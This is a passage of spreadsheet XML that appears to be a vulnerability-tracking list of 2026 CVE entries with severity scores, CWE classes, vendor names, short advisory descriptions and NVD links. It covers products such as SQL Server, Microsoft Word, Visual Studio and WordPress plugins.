          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75624</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75777</t>
        </is>
      </c>
      <c r="C955" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E955" s="5" t="inlineStr"/>
      <c r="F955" s="5" t="inlineStr"/>
      <c r="G955" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H955" s="5" t="inlineStr"/>
      <c r="I955" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L955" s="5" t="inlineStr">
        <is>
          <t>IBM Aspera Enterprise WebApps 1.0.0 through 1.0.5 could allow a local attacker to escape container protections due to unrestricted system calls being permitted within the container.</t>
        </is>
      </c>
      <c r="M955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75777</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76059</t>
        </is>
      </c>
      <c r="C956" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E956" s="5" t="inlineStr"/>
      <c r="F956" s="5" t="inlineStr"/>
      <c r="G956" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H956" s="5" t="inlineStr"/>
      <c r="I956" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L956"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M956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76059</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76647</t>
        </is>
      </c>
      <c r="C957" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E957" s="5" t="inlineStr"/>
      <c r="F957" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="inlineStr"/>
      <c r="I957" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L957" s="5" t="inlineStr">
        <is>
          <t>Leantime JSON-RPC API through version 3.9.0 contains a missing authorization vulnerability in the JSON-RPC dispatcher in app/Domain/Api/Controllers/Jsonrpc.php. The dispatcher does not enforce authorization before invoking service-layer methods, allowing an authenticated user to call methods or act on resources outside their intended permissions. For example, the editOwn method accepts a user-supplied user ID without verifying that it belongs to the caller, allowing an attacker to modify another user's account and set a new password, resulting in account takeover. This vulnerability is distinct from CVE-2026-59712 and CVE-2026-15509 because the root cause is the lack of centralized authorization enforcement in the JSON-RPC dispatcher rather than the behavior of an individual exposed method.</t>
        </is>
      </c>
      <c r="M957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76647</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76801</t>
        </is>
      </c>
      <c r="C958" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E958" s="5" t="inlineStr"/>
      <c r="F958" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="inlineStr"/>
      <c r="I958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L958" s="5" t="inlineStr">
        <is>
          <t>The FireBox – WooCommerce Popup Builder, Exit Intent Popup, Email Optin &amp; Cart Abandonment plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.1.10 via the value function. This is due to a trivially bypassable regex blacklist in Executer::allowedToRun() that fails to block WordPress core functions such as wp_insert_user, update_option, and file_put_contents, combined with no sanitization of PHP condition rule values stored via the firebox_meta REST endpoint. This makes it possible for authenticated attackers, with author-level access and above, to execute code on the server. On sites upgraded from a version prior to 3.1.10, the Migrator::preserveCampaignRoleAccess() function automatically grants the edit_fireboxes and publish_fireboxes capabilities to the Author role, lowering the effective entry point to Author-level access.</t>
        </is>
      </c>
      <c r="M958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76801</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="C959" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E959" s="5" t="inlineStr"/>
      <c r="F959" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="inlineStr"/>
      <c r="I959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L959" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="M959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="C960" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E960" s="5" t="inlineStr"/>
      <c r="F960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="inlineStr"/>
      <c r="I960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L960" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="M960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="C961" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E961" s="5" t="inlineStr"/>
      <c r="F961" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="inlineStr"/>
      <c r="I961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L961" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="C962" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E962" s="5" t="inlineStr"/>
      <c r="F962" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="inlineStr"/>
      <c r="I962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L962" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="C963" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E963" s="5" t="inlineStr"/>
      <c r="F963" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="inlineStr"/>
      <c r="I963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="C964" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E964" s="5" t="inlineStr"/>
      <c r="F964" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="inlineStr"/>
      <c r="I964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L964" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="C965" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E965" s="5" t="inlineStr"/>
      <c r="F965" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="inlineStr"/>
      <c r="I965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L965" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="C966" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E966" s="5" t="inlineStr"/>
      <c r="F966" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="inlineStr"/>
      <c r="I966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L966" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="C967" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E967" s="5" t="inlineStr"/>
      <c r="F967" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="inlineStr"/>
      <c r="I967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L967" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="C968" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E968" s="5" t="inlineStr"/>
      <c r="F968" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G968" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H968" s="5" t="inlineStr"/>
      <c r="I968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L968" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77504</t>
        </is>
      </c>
      <c r="C969" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E969" s="5" t="inlineStr"/>
      <c r="F969" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G969" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H969" s="5" t="inlineStr"/>
      <c r="I969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L969" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77826</t>
        </is>
      </c>
      <c r="C970" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E970" s="5" t="inlineStr"/>
      <c r="F970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="inlineStr"/>
      <c r="I970" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L970" s="5" t="inlineStr">
        <is>
          <t>The RegistrationMagic  WordPress plugin before 6.0.9.9 does not verify which application a Facebook access token was issued to before accepting it as proof of identity, allowing unauthenticated attackers to log in as an existing user whose token they can obtain, or to create and log into a new account even when user registration is disabled.</t>
        </is>
      </c>
      <c r="M970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77826</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77901</t>
        </is>
      </c>
      <c r="C971" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E971" s="5" t="inlineStr"/>
      <c r="F971" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G971" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H971" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L971" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="C972" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E972" s="5" t="inlineStr"/>
      <c r="F972" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="inlineStr"/>
      <c r="I972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L972" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77907</t>
        </is>
      </c>
      <c r="C973" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E973" s="5" t="inlineStr"/>
      <c r="F973" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G973" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H973" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="I973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L973" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77908</t>
        </is>
      </c>
      <c r="C974" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E974" s="5" t="inlineStr"/>
      <c r="F974" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G974" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H974" s="5" t="inlineStr"/>
      <c r="I974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L974" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78439</t>
        </is>
      </c>
      <c r="C975" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E975" s="5" t="inlineStr"/>
      <c r="F975" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G975" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H975" s="5" t="inlineStr"/>
      <c r="I975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L975" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78442</t>
        </is>
      </c>
      <c r="C976" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E976" s="5" t="inlineStr"/>
      <c r="F976" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G976" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H976" s="5" t="inlineStr"/>
      <c r="I976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L976" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="C977" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E977" s="5" t="inlineStr"/>
      <c r="F977" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="inlineStr"/>
      <c r="I977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L977" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="C978" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E978" s="5" t="inlineStr"/>
      <c r="F978" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="inlineStr"/>
      <c r="I978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L978" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78463</t>
        </is>
      </c>
      <c r="C979" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
